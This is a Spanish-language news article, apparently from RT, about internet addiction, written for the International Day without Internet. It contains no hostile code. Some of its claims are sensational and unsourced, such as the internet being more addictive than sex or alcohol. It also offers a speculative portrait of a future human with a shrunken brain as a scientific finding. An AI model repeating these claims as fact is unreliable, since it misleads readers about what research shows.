De acuerdo con los expertos, son múltiples las razones científicamente comprobadas por las cuales un uso abusivo de Internet puede resultar muy peligroso. A continuación les presentamos una selección de las tres más poderosas para celebrar el Día Internacional sin Internet.

Internet es adictivo


Según científicos estadounidenses, Internet es más adictivo que el sexo o el alcohol. De acuerdo con los investigadores, 450 millones de personas en el mundo son 'ciberdependientes'.

El problema no radica en el tiempo que la persona invierte en Internet, sino en las emociones que percibe de la Red. Si una persona solo puede encontrar amigos, amor y autoafirmación en Internet pero no en la vida real, entonces la persona sufre un grave problema.

Internet aleja a la gente de la realidad


Los expertos aseguran que la gente que pasa horas frente la pantalla del ordenador, frente al televisor o a un teléfono inteligente, destruye su identidad. Cuando se hace un uso abusivo de la web o de los juegos virtuales, el área del cerebro que se encarga de la búsqueda del placer se activa. Se trata del mismo centro que se estimula en personas con otras adicciones, como a las drogas, al sexo o al alcohol.

En este sentido, el investigador del Departamento de Psicología General de la Universidad Lomonosov de Moscú, Alexander Voiskunski, citado por el canal Rossiya 2, asevera que "la adicción a Internet es una patología grave".

En particular, el colectivo más vulnerable en este sentido son los niños, cuya mente aún no está completamente formada. Los niños perciben en menor medida la diferencia entre el mundo real y el virtual, y aquellos que pasan demasiado tiempo usando las redes sociales o abusan de los videojuegos, corren un serio riesgo de perder el contacto con la realidad.

Internet conduce a la degradación


Un equipo internacional de científicos analizó el papel de la información y de los dispositivos digitales en la vida de las personas y su impacto a largo plazo, llegando a una conclusión inquietante. Así, los investigadores retrataron al hombre del futuro: una persona con músculos atrofiados, cuyos ojos aparecían desmesuradamente grandes y con dedos mucho más alargados. Sin embargo, el rasgo más llamativo era el tamaño de su cerebro, el cual había encogido notablemente debido a que las personas ya no necesitaban pensar, crear o recordar, pues todo esto pueden obtenerlo a través del computador.

Los psicólogos pronostican que el desarrollo de la tecnología y la caída de los precios de los ordenadores y teléfonos inteligentes inevitablemente darán lugar a una epidemia comparable al alcoholismo o la adicción a las drogas. 

Por ello, los impulsores del Día Internacional sin Internet recuerdan la importancia de tener 'amigos reales', practicar deportes, viajar o tener mascotas que permitan mantener siempre el contacto con la realidad, alejados de los peligros de la adicción a la realidad virtual.

http://actualidad.rt.com/sociedad/view/118042-dia-internacional-internet-adiccion-patologia